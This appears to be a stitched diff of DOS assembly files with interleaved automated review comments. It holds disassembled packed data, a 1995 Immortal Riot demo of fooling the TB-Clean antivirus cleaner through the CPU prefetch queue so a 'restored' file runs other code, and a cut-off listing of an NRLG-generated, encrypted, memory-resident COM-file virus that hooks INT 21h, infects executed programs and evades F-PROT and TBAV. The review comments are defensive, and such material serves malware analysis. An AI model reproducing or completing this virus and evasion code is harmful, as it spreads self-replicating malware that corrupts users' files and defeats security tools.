db 78h, 9Eh,0B8h
db 42h, 2Dh, 7Eh
db 18h, 18h, 91h, 70h
loc_36:
push dx
push ds
sbb bl,ds:data_30e
js loc_36 ; Jump if sign=1
jo loc_41 ; Jump if overflow=1
push ax
adc byte ptr ds:[236h],bh
db 36h, 76h,0F6h, 66h, 4Eh, 12h
db 37h, 0Ch, 7Dh,0DBh, 7Eh, 33h
db 3Ch, 7Eh, 37h, 00h,0DBh, 30h
db 00h, 80h,0E0h,0F0h,0FCh,0FEh
db 0FCh,0F0h,0E0h
db 37h
data_22 db 80h
db 80h, 10h, 02h, 0Eh, 3Eh, 7Eh
db 0FEh, 7Eh, 3Eh, 0Eh, 02h, 77h
db 0D6h,0ADh, 5Ch, 61h,0EBh,0CCh
db 0B2h, 66h, 01h, 08h, 93h, 24h
db 10h, 7Fh,0DBh, 01h, 7Bh, 1Bh
db 2Fh, 00h, 01h, 30h,0C6h,0C6h
db 60h, 7Ch,0F6h
loc_40:
xchg ax,sp
xchg bl,dh
jl $+0Eh ; Jump if <
or [si+0],bh
push si
loc_41:
sbb word ptr [bp+233h],0FA50h
;* jg loc_46 ;*Jump if >
db 7Fh, 4Fh
jle $+5 ; Jump if < or =
db 60h,0C0h,0FFh, 09h, 0Dh, 70h
db 01h, 0Ch, 0Eh,0FFh, 1Ah, 40h
db 0Eh, 0Ch, 01h,0A3h, 30h, 70h
db 0FEh, 70h, 30h, 83h,0D2h, 02h
db 0B4h,0C0h, 01h,0FEh, 41h,0C3h
db 01h, 0Fh, 24h, 66h,0FFh, 66h
db 24h, 02h, 90h
db 42h
db 2Fh, 83h, 00h, 8Bh, 0Eh, 1Ah
db 0FAh, 7Ch, 38h, 01h,0B1h, 04h
db 01h, 40h,0D5h, 9Dh, 7Ch, 7Dh
db 2Dh, 75h, 90h, 36h, 01h, 14h
db 02h
db 20h, 65h, 7Bh, 6Ch
db 01h,0FEh, 03h, 6Ch, 0Bh,0EAh
db 0B0h,0F2h
loc_46:
db 0C0h, 78h, 3Ch, 06h,0EEh, 05h
db 38h,0C2h, 00h, 62h, 66h, 0Ch
db 18h, 30h, 66h,0C6h, 81h, 80h
db 0Dh, 38h, 6Ch, 38h, 30h, 76h
db 7Eh,0B0h, 76h,0B3h
db 0F4h,0CCh, 01h, 18h, 03h, 70h
db 0DCh,0EEh, 2Bh, 01h, 18h,0E2h
db 0DCh, 7Ah, 09h, 01h, 18h
db 00h,0E2h,0A1h, 0Fh, 42h,0FEh
db 38h, 6Ch, 02h,0A3h
db 0F4h,0AEh,0EFh, 05h,0B7h, 04h
db 58h,0FEh,0BFh, 48h, 09h,0D8h
db 1Fh, 01h, 03h, 06h
db 5Dh, 2Eh
db 08h, 60h,0C0h,0F0h, 7Eh, 92h
db 0Fh, 7Dh,0DBh,0DBh, 05h, 3Ch
db 0F8h, 90h, 78h, 82h,0B0h,0DDh
db 0D0h, 30h,0C6h, 45h,0D5h, 54h
db 10h, 06h, 06h
db 0EEh, 01h, 03h, 28h,0DEh, 0Ch
db 1Ch, 3Ch, 6Ch,0DDh,0E5h, 86h
db 0FEh, 7Fh, 1Eh, 7Bh,0C2h,0C0h
db 0C0h,0FCh, 1Eh,0A8h, 01h, 20h
db 1Eh, 10h,0FAh, 68h, 44h, 0Eh
db 0FEh,0CFh, 9Fh, 4Fh, 01h, 60h
db 0C6h, 7Ch,0BEh,0F5h, 01h, 20h
db 0Ch, 7Eh, 00h
db 40h, 7Dh
db 0F6h,0DCh, 04h, 04h, 10h, 77h
db 0FBh,0F0h,0CDh, 60h, 70h, 36h
db 40h,0FFh, 01h,0CCh,0FDh, 01h
db 1Bh,0C2h,0D3h,0B0h, 60h, 0Ch
db 18h, 00h,0E0h, 15h
data_23 dw 705Eh ; Data table (indexed access)
db 0DEh, 01h,0DCh,0C0h, 7Eh, 31h
db 08h, 22h, 38h, 38h, 6Ch,0FFh
db 0E2h, 67h, 66h,0C0h, 01h, 8Ah
db 0Dh, 20h,0FCh,0B2h, 33h, 32h
db 3Ch, 32h, 33h, 05h,0FCh,0B0h
db 43h, 08h, 60h, 33h, 61h,0F2h
db 08h, 6Fh,0C4h, 6Ch,0DFh,0F8h
db 6Ch, 98h, 3Ch, 36h, 33h, 01h
db 0F3h, 76h, 3Ch, 20h, 29h, 9Dh
db 7Ch,0DAh, 7Eh, 04h, 33h, 40h
db 07h, 83h, 21h,0FFh,0B0h, 32h
db 7Eh, 70h, 00h,0EFh, 00h, 1Ch
db 36h, 63h, 70h, 09h,0C1h,0C0h
db 0CCh,0CCh,0DCh,0BFh, 00h, 50h
db 98h, 0Eh,0E6h, 66h, 6Fh,0FEh
db 04h, 66h, 6Eh,0E0h, 70h, 60h
db 0Eh, 1Bh, 1Fh,0FCh,0D8h, 7Fh
db 4Eh,0C1h, 0Ah,0BEh,0FFh, 1Bh
db 20h, 36h, 13h
db 0CCh, 4Ch, 7Ch, 72h, 03h, 00h
db 0CEh,0C3h,0C3h,0C6h,0CCh,0D8h
db 0F0h,0F8h,0CCh,0C6h,0C0h, 80h
db 83h,0C5h, 3Eh, 6Fh, 37h,0FCh
db 09h,0E0h, 62h,0C0h,0E3h, 63h
db 73h, 7Fh, 5Bh, 43h, 43h,0C3h
db 80h, 92h,0E0h, 07h, 30h, 63h
db 0B0h, 15h, 11h, 67h, 63h, 61h
db 0E0h, 31h, 1Eh, 0Ah,0E3h,0F3h
db 80h,0C3h, 44h, 5Fh, 20h, 02h
db 0C9h,0ACh,0F3h,0B3h, 33h, 3Bh
db 36h, 42h, 3Ch,0F0h, 0Dh,0C0h
db 21h,0E3h,0C1h,0C1h,0D1h,0DBh
db 0DFh,0CEh, 7Eh, 07h, 03h, 80h
db 02h, 1Fh,0E6h
db 'Pf|xnwIg@'
db 11h,0EEh, 3Eh
db 0B0h, 95h, 70h, 1Ch, 06h, 66h
db 3Eh, 6Eh,0FFh, 99h, 0Ch, 7Fh
db 51h, 01h, 5Eh, 03h, 25h, 17h
db 7Bh, 01h,0C7h,0EEh, 58h,0F0h
db 0C0h, 01h, 13h, 1Eh
db 36h, 08h
db 1Bh,0D0h
db 18h, 99h, 01h,0BDh,0E7h,0B3h
db 54h, 42h, 0Eh, 29h, 42h,0FBh
db 50h,0A9h,0CEh, 7Eh, 06h
db 42h, 0Ch, 29h
db 0F9h, 10h, 81h
dw 2412h ; Data table (indexed access)
db 3Ch, 14h, 02h
db 11h, 03h, 0Fh, 3Bh,0E3h,0CAh
db 0C9h,0BEh, 33h, 25h,0F8h,0D1h
db 7Ch, 60h,0FDh,0D0h, 01h, 20h
db 80h, 02h, 2Eh,0FDh, 06h, 03h
db 01h,0BCh, 27h,0D0h, 8Dh, 20h
db 10h,0E8h, 61h, 38h, 6Ch,0C6h
db 00h, 0Eh, 01h,0A9h,0C3h, 50h
db 67h, 0Ch, 08h, 19h, 78h,0D8h
db 0D8h,0DCh, 21h, 0Ch,0B0h, 00h
db 0E0h,0C0h,0C7h, 5Eh, 7Eh,0F3h
db 33h, 33h, 53h,0C1h, 8Fh, 02h
db 4Ch,0F0h, 00h, 00h, 07h, 6Ch
db 7Eh,0CFh,0CCh,0CCh, 7Fh, 03h
db 4Ch, 3Eh, 3Ch, 67h,0C3h,0F3h
db 0DEh,0C0h, 6Eh, 3Ch, 0Ch, 06h
db 0A0h, 08h, 1Ch, 5Ch, 30h, 34h
db 0FCh,0B0h, 09h, 78h, 00h,0D0h
db 7Bh,0CEh,0C6h,0CEh, 76h,0B8h
db 0B8h,0E2h, 1Ch, 3Dh, 72h, 61h
db 03h,0A8h,0F0h, 0Eh, 01h, 61h
db 36h, 82h, 39h, 04h, 02h, 00h
db 03h, 03h,0C6h,0CCh, 8Fh, 8Fh
db 00h, 69h, 0Ah, 30h, 18h, 01h
db 12h, 66h,0FFh,0EBh,0E9h, 84h
db 63h, 01h, 40h, 0Eh, 40h, 60h
db 7Ch,0E6h, 65h, 5Eh,0B3h, 60h
db 0C0h, 83h, 1Eh, 67h, 01h,0CEh
db 2Ch, 5Ah, 40h, 03h,0B3h, 5Ch
db 54h, 03h,0A5h, 04h,0E0h,0C1h
db 0CEh,0CDh,0CCh,0CDh,0CEh, 7Ch
db 0D2h, 86h, 9Fh, 41h, 62h, 60h
db 60h,0F8h,0DFh, 76h, 63h, 00h
db 2Fh, 71h, 6Ch, 3Ch, 3Fh, 3Eh
db 9Ah, 0Ch,0F0h,0B0h, 01h,0D0h
loc_63:
db 6Ah,0BCh, 03h, 43h, 01h, 00h
db 0A8h, 99h, 02h, 36h, 01h,0D0h
db 18h
loc_64:
db 0C6h, 2Dh, 00h, 00h, 01h,0C3h
db 1Ch, 3Fh,0C1h, 3Ch, 66h,0C3h
db 10h, 80h, 08h,0B9h,0C1h, 63h
db 36h, 1Ch,0B1h
loc_65:
add word ptr ds:[0C1h],bp
or [bx+si-28h],bh
xor [si],ah
jl loc_64 ; Jump if <
dec cx
push bx
xor dl,ch
jo loc_65 ; Jump if overflow=1
push cs
add word ptr [bp+0],0
nop ;*ASM fixup - displacement
nop ;*ASM fixup - sign extn byte
add [bx+si],ax
cmp [di+1Ch],bx
and al,18h
add word ptr [bp+7600h],7DCh
esc 6,al ; coprocessor escape
mov al,12h
retn 8857h
into ; Int 4 on overflow
db 66h,0CFh,0C6h, 64h, 81h, 82h
db 0Ch,0CCh, 5Fh,0C6h,0C6h, 4Ch
db 1Eh, 03h, 01h,0CEh, 76h, 1Dh
db 0CAh
db 5Eh, 23h
db 0FEh,0C0h,0A5h, 80h, 90h, 30h
db 78h,0CCh, 00h, 78h, 0Ch, 7Ch
db 90h, 8Bh,0C1h, 7Ah,0B0h, 20h
db 0CCh, 04h, 10h, 8Ch, 87h,0F5h
db 03h, 10h
db 0FFh, 04h, 30h,0C3h,0C2h, 12h
db 2Dh,0CEh, 2Eh, 0Ch, 43h, 50h
db 3Eh, 7Bh, 02h, 60h, 50h, 03h
db 70h,0B0h, 47h, 9Fh, 03h, 20h
db 0B0h, 5Dh, 78h, 38h,0EFh, 3Ch
db 0DEh, 67h,0AFh, 04h, 10h, 80h
db 0CFh, 90h, 02h, 10h,0CFh, 02h
db 0CAh,0B7h, 40h,0D2h, 8Fh, 4Fh
db 21h, 02h, 10h,0DFh,0FEh, 21h
db 1Fh, 4Ch, 50h, 01h,0B7h,0E0h
db 66h,0DBh, 1Bh, 7Fh,0D8h,0D8h
db 0DFh,0B0h, 7Eh, 2Ah,0E9h, 0Bh
db 01h,0FEh, 04h,0DEh,0C3h,0B2h
db 00h,0A3h, 37h,0FBh, 90h, 48h
db 02h, 10h,0DDh,0B3h,0B0h, 00h
db 10h, 30h, 61h,0F6h, 02h, 50h
db 0A0h, 02h, 10h, 0Bh, 9Fh, 6Fh
db 0FCh,0F7h, 10h, 4Fh, 40h, 83h
db 7Fh, 8Fh, 70h, 05h, 5Fh, 70h
db 0C0h,0A8h, 92h, 6Eh,0CDh,0BAh
db 0F0h,0F8h,0E2h,0BEh, 66h,0F6h
db 6Ch, 9Fh, 48h,0EEh, 0Fh, 3Ch
db 20h, 70h, 88h, 7Bh,0FCh,0C0h
db 0CCh,0DEh, 70h, 28h, 80h, 07h
db 0Eh, 56h, 48h, 1Bh, 18h, 3Fh
db 01h, 2Eh, 34h,0D8h, 70h, 01h
db 02h
db 0CCh, 86h,0A0h, 10h, 02h, 40h
db 8Bh,0FFh, 00h, 80h,0F0h, 91h
db 48h, 3Eh, 04h, 7Eh,0D0h, 2Dh
db 0F1h, 60h,0BCh, 5Fh,0E6h, 16h
db 1Ch, 0Fh, 2Bh,0E6h,0F6h,0DEh
db 0CEh, 00h, 34h, 60h, 00h, 3Ch
db 6Ch, 6Ch, 3Eh, 00h, 7Eh, 00h
db 06h,0D1h, 7Ch, 7Ah, 38h, 00h
db 7Ch,0E2h, 90h, 02h,0CDh,0E0h
db 08h, 2Dh, 5Fh, 02h, 55h,0B6h
db 2Eh, 31h,0D2h, 03h, 1Ch,0E1h
db 95h, 51h, 72h, 48h,0CEh, 60h
db 62h, 66h, 6Ch, 85h,0CAh, 0Fh
db 0DCh, 36h, 9Ah, 3Eh, 10h, 36h
db 6Eh,0DEh,0CEh, 25h, 36h, 7Eh
db 23h, 5Ah, 1Eh, 0Eh, 3Ch, 00h
db 62h, 11h, 7Ah,0C4h, 6Ch,0D8h
db 6Ch, 36h, 01h, 4Eh, 72h,0D2h
db 0Eh, 6Ch,0D8h, 0Bh, 11h, 44h
db 0E9h, 74h, 04h, 02h,0AAh, 55h
db 04h, 02h,0DDh, 77h, 04h, 02h
db 5Dh, 7Fh, 18h
db 0Dh, 01h,0F8h, 05h, 0Eh,0DDh
db 0EEh, 10h, 36h, 01h,0F6h, 08h
db 2Fh,0F4h,0A2h, 03h, 10h,0CEh
db 0DBh, 06h, 30h,0F6h, 06h, 30h
db 0EFh, 5Eh, 06h, 01h, 3Eh, 05h
db 20h, 0Fh,0DFh
db 30h
db 0BDh, 12h,0F7h, 6Fh, 10h, 90h
db 05h,0AAh,0EBh, 03h,0F8h, 05h
db 0C0h
db 1Fh, 03h,0A5h, 79h, 30h, 01h
db 0FFh, 06h, 2Ah, 6Fh,0A6h, 06h
db 30h, 05h
db 74h
loc_72:
push word ptr [bx+0Dh]
push es
inc ax
add ax,1F2Eh
add ax,3A3Ah
adc [bx],dh
add ax,ax
aaa ; Ascii adjust
xor [bx],bh
add bp,[bp+3Fh]
popf ; Pop flags
pop si
xor [si],al
and bh,dh
add [si],al
nop
mov dx,0E06h
test word ptr [di],3740h
add sp,[bx+si]
db 0FFh,0FBh,0FFh, 30h, 40h,0BEh
db 0BDh, 30h,0DEh, 04h, 20h,0BAh
db 0DEh, 01h, 06h, 60h,0FFh, 06h
db 0E0h,0A0h,0FBh, 05h, 88h, 3Fh
db 03h,0F0h, 1Fh, 70h, 6Ah, 40h
db 01h, 1Fh, 07h,0D0h, 75h, 20h
db 3Fh, 05h, 40h,0FFh, 04h, 90h
db 0Dh
db 0Dh, 18h, 06h, 60h, 06h,0AFh
db 0DEh,0B0h, 50h,0FFh, 05h, 01h
db 0C2h,0A9h, 00h,0CAh, 01h
loc_75:
lock jmp short loc_75
add ax,0F01h
add ax,601h
cmp ds:data_56e[bx+si],dl
int 10h ; ??INT Non-standard interrupt
jcxz $+2 ; Jump if cx=0
mov al,byte ptr ds:[0CC78h]
esc 0,[bp+si+3615h] ; coprocessor escape
out 0DCh,al ; port 0DCh, DMA-2 clr mask reg
db 0C0h, 70h,0C5h, 62h,0FEh, 66h
db 62h, 71h, 96h,0EDh, 00h, 5Fh
db 6Ch, 01h, 27h, 8Bh,0D0h, 62h
db 80h, 96h, 9Fh, 30h, 62h,0C6h
db 00h, 09h,0E5h, 73h, 7Eh,0D8h
db 20h,0D8h, 70h,0B3h,0E9h, 50h
db 01h, 7Ch, 2Bh,0B3h, 71h, 71h
db 81h, 61h, 01h, 1Ch,0FEh, 38h
db 0EAh,0BDh, 90h, 6Ch, 06h, 40h
db 0ECh, 89h, 9Fh, 33h,0CBh, 61h
db 0Fh, 0Eh, 01h,0EEh,0D5h, 8Ah
db 0D0h, 89h, 3Ch, 66h, 7Ch,0BAh
db 12h, 00h, 19h,0EDh, 70h, 82h
db 53h, 40h, 63h, 02h, 06h, 7Ch
db 0CEh,0DEh,0F6h,0F6h, 3Eh,0D9h
db 70h, 71h, 30h, 32h, 5Ah,0E0h
db 30h, 1Ch, 01h,0D9h,0ADh, 60h
db 01h, 01h, 6Ah,0F5h, 2Dh,0FEh
db 02h, 33h,0AAh,0BEh, 5Fh, 7Eh
db 6Ah, 55h, 90h, 06h, 8Dh,0ADh
db 0ACh, 7Eh, 00h, 6Fh,0F2h,0A3h
db 6Dh, 72h, 0Ch, 1Eh, 1Ah, 29h
db 5Ah, 09h, 12h, 58h, 78h, 30h
db 00h,0A5h,0D5h, 7Ah, 7Eh, 00h
db 03h,0B1h,0B0h, 2Fh, 25h,0D0h
db 5Bh, 97h, 78h,0CCh, 01h,0CAh
db 07h,0FDh, 1Bh,0ADh, 11h, 05h
db 0E1h,0D4h, 0Ah,0D8h,0D8h, 78h
db 38h, 14h,0D8h,0B0h,0A2h, 01h
db 8Ch, 00h,0D8h, 6Ch,0B4h,0A1h
db 04h, 3Fh, 7Eh,0F5h, 36h, 01h
db 00h, 1Ch, 01h,0FCh,0B4h,0A1h
db 00h,0FCh, 00h, 0Dh, 6Dh,0FCh
db 00h,0FCh, 68h, 43h, 00h,0FCh
db 00h, 1Bh,0DAh,0FCh, 00h,0FCh
db 0D0h, 86h, 00h,0FCh, 00h, 36h
db 0B4h,0FCh, 00h,0FCh,0A1h, 0Dh
db 00h,0FCh, 6Dh, 68h, 00h,0FCh
db 00h,0FCh, 43h, 1Bh, 00h,0FCh
db 0DAh,0D0h, 00h,0FCh, 00h, 86h
db 06h, 8Ah, 00h,0FFh, 00h
seg_a ends
end
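Review bot: From `loc_33` down to `seg_a ends` the listing looks like the disassembler's guess at packed data rather than code, so mnemonics there such as `lock jmp short loc_75`, `esc 6,al` and `retn 8857h` should not be read as program logic. The only logic the visible lines establish is the stub at the top: it copies itself upward and far-returns into the copy, moves the packed image backwards (`std` / `rep movsw`), expands it from a bit stream held in `bp` with `dx` as the bit counter, and at `loc_31` clears the registers and does `retf` to `es:100h`. A header comment saying so would help, along with a note that the `db` rows after that `retf` are presumably the tables read through `cs:[11Ch][bx]` and `cs:[12Ch][bx]`. What the unpacked image does cannot be determined from this listing and has to be established by unpacking it in an isolated environment.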
@@ -0,0 +1,88 @@
;
; How to fool TB-Clean using the prefetch queue.
;
; Conzouler / Immortal Riot 1995.
;
; (Ideas from 40Hex magazine issue 7)
;
; Debuggers like TB-Clean reads one instruction a time from
; memory while the processor will read 16 and put them in a
; prefetch queue. Therefore, if you change code that already
; is is in the prefetch the change won't affect the program
; when run normally, but if the program is run with TB-Clean
; it will run the changed code.
; Any branch (jumps, calls, ints and rets) will flush the
; prefetch and 16 bytes will be read from the new position.
; So, you can change the location of a jump to make some
; code run if a debugger is used but another when executed
; normally. Get it?
; The fun part with TB-Clean is that you can use this tech-
; nique to simulate a program restoration but instead you
; put some mean code instead of the original program.
;
; You can also just do an int20 when tbscan is executed and
; make TB-Clean say: "File might not be infected at all or
; is damaged by an overwriting virus". Which is exactly what
; TB-Clean would say if the file wasn't infected in the first
; place.
;
; Try to compile this code and run it, then use TB-Clean on it
; and rerun the "cleaned" file.
;
.model tiny
.code
org 100h
start:
jmp entry
; Carrier file...
carrier db 1+offset nodebug-offset debug dup(90h)
; Your code...
entry:
call delta ; Get delta offset.
delta: pop si ; TbScan will detect this
; but this is about fooling
; TbClean.
mov byte ptr ds:[$+6], 0 ; This changes the jump.
jmp short nodebug ; If this is a near jump
; you'll have to make above
; a word ptr and add 7 instead.
; Here is the code that simulates a restoration.
mov di, 100h ; Offset to entry point.
push di ; Save to perform a ret later
add si, offset debug - offset delta
; Relative offset to routine
; to put at entry point.
mov cx, offset nodebug - offset debug
; Size of routine.
rep movsb ; Move the code.
ret ; Jump to entry point.
debug:
; Here is the routine TBClean will put in the restored program.
mov ah, 9 ; Display string.
mov dx, 100h + offset tbsux - offset debug
int 21h
ret ; Instead of int20
tbsux db 'TB-Clean stinks!!!',7,'$'
nodebug:
; Here is your normal code.
mov ah, 9h ; Display string
add si, offset msg - offset delta
mov dx, si
int 21h
int 20h
msg db 'Hi dudez.. tbclean cannot disinfect diz...$'
end start
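Review bot: The header comment presents the 16-byte prefetch as a fixed property of "the processor", but the outcome of `mov byte ptr ds:[$+6], 0` followed by `jmp short nodebug` depends on the CPU model and on whether the tracing tool models a prefetch queue. For a defender the relevant consequence is the one the comment itself describes further down: a file "restored" by tracing holds whatever the traced path copied to offset 100h, so cleaner output for such a sample should be treated as untrusted and the file restored from a known-good copy. Statically, an immediate store into the operand of the very next branch is an unusual pattern that a heuristic can flag. I would add a line such as `; NOTE: prefetch depth is CPU-specific; results differ between processors and between tracing tools` to the header.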
@@ -0,0 +1,490 @@
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ THiS iS a [NuKE] RaNDoMiC LiFe GeNeRaToR ViRuS. ³ [NuKE] PoWeR
;³ CReaTeD iS a N.R.L.G. PRoGRaM V0.66 BeTa TeST VeRSioN ³ [NuKE] WaReZ
;³ auToR: aLL [NuKE] MeMeBeRS ³ [NuKE] PoWeR
;³ [NuKE] THe ReaL PoWeR! ³ [NuKE] WaReZ
;³ NRLG WRiTTeR: AZRAEL (C) [NuKE] 1994 ³ [NuKE] PoWeR
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
.286
code segment
assume cs:code,ds:code
org 100h
start: CALL NEXT
NEXT:
mov di,sp ;take the stack pointer location
mov bp,ss:[di] ;take the "DELTA HANDLE" for my virus
sub bp,offset next ;subtract the large code off this code
;
;*******************************************************************
; #1 DECRYPT ROUTINE
;*******************************************************************
cmp byte ptr cs:[crypt],0b9h ;is the first runnig?
je crypt2 ;yes! not decrypt
;----------------------------------------------------------
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt]+ bp ;di = first byte to decrypt
mov dx,1 ;dx = value for decrypt
;----------------------------------------------------------
deci: ;deci = fuck label!
;----------------------------------------------------------
ÿxor word ptr [di],0fbfbh
add byte ptr [di],087h
add word ptr [di],0c574h
add byte ptr [di],0b8h
sub word ptr [di],04d33h
sub byte ptr [di],0b2h
sub word ptr [di],0279h
sub word ptr [di],01bc5h
sub word ptr [di],01a8ah
add word ptr [di],0d649h
add byte ptr [di],0b4h
xor byte ptr [di],0cch
sub byte ptr [di],089h
inc word ptr [di]
xor byte ptr [di],098h
not word ptr [di]
ÿinc di
inc di
;----------------------------------------------------------
jmp bye ;######## BYE BYE F-PROT ! ##########
mov ah,4ch
int 21h
bye: ;#### HEY FRIDRIK! IS ONLY A JMP!!###
;-----------------------------------------------------------
mov ah,0bh ;######### BYE BYE TBAV ! ##########
int 21h ;### (CANGE INT AT YOU PLEASURE) ###
;----------------------------------------------------------
loop deci ;repeat please!
;
;*****************************************************************
; #2 DECRYPT ROUTINE
;*****************************************************************
;
crypt: ;fuck label!
;
mov cx,offset fin ;cx = large of virus
lea di,[offset crypt2] + bp ;di = first byte to decrypt
;---------------------------------------------------------------
deci2: ;
xor byte ptr cs:[di],1 ;decrytion rutine
inc di ;very simple...
loop deci2 ;
;---------------------------------------------------------------
crypt2: ;fuck label!
;
MOV AX,0CACAH ;call to my resident interrup mask
INT 21H ;for chek "I'm is residet?"
CMP Bh,0CAH ;is equal to CACA?
JE PUM2 ;yes! jump to runnig program
call action
;*****************************************************************
; NRLG FUNCTIONS (SELECTABLE)
;*****************************************************************
ÿcall ANTI_V
;****************************************************************
; PROCESS TO REMAIN RESIDENT
;****************************************************************
mov ax,3521h
int 21h ;store the int 21 vectors
mov word ptr [bp+int21],bx ;in cs:int21
mov word ptr [bp+int21+2],es ;
;---------------------------------------------------------------
push cs ;
pop ax ;ax = my actual segment
dec ax ;dec my segment for look my MCB
mov es,ax ;
mov bx,es:[3] ;read the #3 byte of my MCB =total used memory
;---------------------------------------------------------------
push cs ;
pop es ;
sub bx,(offset fin - offset start + 15)/16 ;subtract the large of my virus
sub bx,17 + offset fin ;and 100H for the PSP total
mov ah,4ah ;used memory
int 21h ;put the new value to MCB
;---------------------------------------------------------------
mov bx,(offset fin - offset start + 15)/16 + 16 + offset fin
mov ah,48h ;
int 21h ;request the memory to fuck DOS!
;---------------------------------------------------------------
dec ax ;ax=new segment
mov es,ax ;ax-1= new segment MCB
mov byte ptr es:[1],8 ;put '8' in the segment
;--------------------------------------------------------------
inc ax ;
mov es,ax ;es = new segment
lea si,[bp + offset start] ;si = start of virus
mov di,100h ;di = 100H (psp position)
mov cx,offset fin - start ;cx = lag of virus
push cs ;
pop ds ;ds = cs
cld ;mov the code
rep movsb ;ds:si >> es:di
;--------------------------------------------------------------
mov dx,offset virus ;dx = new int21 handler
mov ax,2521h ;
push es ;
pop ds ;
int 21h ;set the vectors
;-------------------------------------------------------------
pum2: ;
;
mov ah,byte ptr [cs:bp + real] ;restore the 3
mov byte ptr cs:[100h],ah ;first bytes
mov ax,word ptr [cs:bp + real + 1] ;
mov word ptr cs:[101h],ax ;
;-------------------------------------------------------------
mov ax,100h ;
jmp ax ;jmp to execute
;
;*****************************************************************
;* HANDLER FOR THE INT 21H
;*****************************************************************
;
VIRUS: ;
;
cmp ah,4bh ;is a 4b function?
je REPRODUCCION ;yes! jump to reproduce !
cmp ah,11h
je dir
cmp ah,12h
je dir
dirsal:
cmp AX,0CACAH ;is ... a caca function? (resident chek)
jne a3 ;no! jump to a3
mov bh,0cah ;yes! put ca in bh
a3: ;
JMP dword ptr CS:[INT21] ;jmp to original int 21h
ret ;
make db 'FORNICAT by [NRLG]'
dir:
jmp dir_s
;-------------------------------------------------------------
REPRODUCCION: ;
;
pushf ;put the register
pusha ;in the stack
push si ;
push di ;
push bp ;
push es ;
push ds ;
;-------------------------------------------------------------
push cs ;
pop ds ;
mov ax,3524H ;get the dos error control
int 21h ;interupt
mov word ptr error,es ;and put in cs:error
mov word ptr error+2,bx ;
mov ax,2524H ;change the dos error control
mov dx,offset all ;for my "trap mask"
int 21h ;
;-------------------------------------------------------------
pop ds ;
pop es ;restore the registers
pop bp ;
pop di ;
pop si ;
popa ;
popf ;
;-------------------------------------------------------------
pushf ;put the registers
pusha ;
push si ;HEY! AZRAEL IS CRAZY?
push di ;PUSH, POP, PUSH, POP
push bp ;PLEEEEEAAAAAASEEEEEEEEE
push es ;PURIFY THIS SHIT!
push ds ;
;-------------------------------------------------------------
mov ax,4300h ;
int 21h ;get the file
mov word ptr cs:[attrib],cx ;atributes
;-------------------------------------------------------------
mov ax,4301h ;le saco los atributos al
xor cx,cx ;file
int 21h ;
;-------------------------------------------------------------
mov ax,3d02h ;open the file
int 21h ;for read/write
mov bx,ax ;bx=handle
;-------------------------------------------------------------
mov ax,5700h ;
int 21h ;get the file date
mov word ptr cs:[hora],cx ;put the hour
mov word ptr cs:[dia],dx ;put the day
and cx,word ptr cs:[fecha] ;calculate the seconds
cmp cx,word ptr cs:[fecha] ;is ecual to 58? (DEDICATE TO N-POX)
jne seguir ;yes! the file is infected!
jmp cerrar ;
;------------------------------------------------------------
seguir: ;
mov ax,4202h ;move the pointer to end
call movedor ;of the file
;------------------------------------------------------------
push cs ;
pop ds ;
sub ax,3 ;calculate the
mov word ptr [cs:largo],ax ;jmp long
;-------------------------------------------------------------
mov ax,04200h ;move the pointer to
call movedor ;start of file
;----------------------------------------------------------
push cs ;
pop ds ;read the 3 first bytes
mov ah,3fh ;
mov cx,3 ;
lea dx,[cs:real] ;put the bytes in cs:[real]
int 21h ;
;----------------------------------------------------------
cmp word ptr cs:[real],05a4dh ;the 2 first bytes = 'MZ' ?
jne er1 ;yes! is a EXE... fuckkk!
;----------------------------------------------------------
jmp cerrar
er1:
;----------------------------------------------------------
mov ax,4200h ;move the pointer
call movedor ;to start fo file
;----------------------------------------------------------
push cs ;
pop ds ;
mov ah,40h ;
mov cx,1 ;write the JMP
lea dx,[cs:jump] ;instruccion in the
int 21h ;fist byte of the file
;----------------------------------------------------------
mov ah,40h ;write the value of jmp
mov cx,2 ;in the file
lea dx,[cs:largo] ;
int 21h ;
;----------------------------------------------------------
mov ax,04202h ;move the pointer to
call movedor ;end of file
;----------------------------------------------------------
push cs ;
pop ds ;move the code
push cs ;of my virus
pop es ;to cs:end+50
cld ;for encrypt
mov si,100h ;
mov di,offset fin + 50 ;
mov cx,offset fin - 100h ;
rep movsb ;
;----------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt2 - offset start) ;virus
enc: ;
xor byte ptr cs:[di],1 ;encrypt the virus
inc di ;code
loop enc ;
;---------------------------------------------------------
mov cx,offset fin
mov di,offset fin + 50 + (offset crypt - offset start) ;virus
mov dx,1
enc2: ;
ÿnot word ptr [di]
xor byte ptr [di],098h
dec word ptr [di]
add byte ptr [di],089h
xor byte ptr [di],0cch
sub byte ptr [di],0b4h
sub word ptr [di],0d649h
add word ptr [di],01a8ah
add word ptr [di],01bc5h
add word ptr [di],0279h
add byte ptr [di],0b2h
add word ptr [di],04d33h
sub byte ptr [di],0b8h
sub word ptr [di],0c574h
sub byte ptr [di],087h
xor word ptr [di],0fbfbh
ÿinc di
inc di ;the virus code
loop enc2 ;
;--------------------------------------------
mov ah,40h ;
mov cx,offset fin - offset start ;copy the virus
mov dx,offset fin + 50 ;to end of file
int 21h ;
;----------------------------------------------------------
cerrar: ;
;restore the
mov ax,5701h ;date and time
mov cx,word ptr cs:[hora] ;file
mov dx,word ptr cs:[dia] ;
or cx,word ptr cs:[fecha] ;and mark the seconds
int 21h ;
;----------------------------------------------------------
mov ah,3eh ;
int 21h ;close the file
;----------------------------------------------------------
pop ds ;
pop es ;restore the
pop bp ;registers
pop di ;
pop si ;
popa ;
popf ;
;----------------------------------------------------------
pusha ;
;
mov ax,4301h ;restores the atributes
mov cx,word ptr cs:[attrib] ;of the file
int 21h ;
;
popa ;
;----------------------------------------------------------
pushf ;
pusha ; 8-( = f-prot
push si ;
push di ; 8-( = tbav
push bp ;
push es ; 8-) = I'm
push ds ;
;----------------------------------------------------------
mov ax,2524H ;
lea bx,error ;restore the
mov ds,bx ;errors handler
lea bx,error+2 ;
int 21h ;
;----------------------------------------------------------
pop ds ;
pop es ;
pop bp ;restore the
pop di ;resgisters
pop si ;
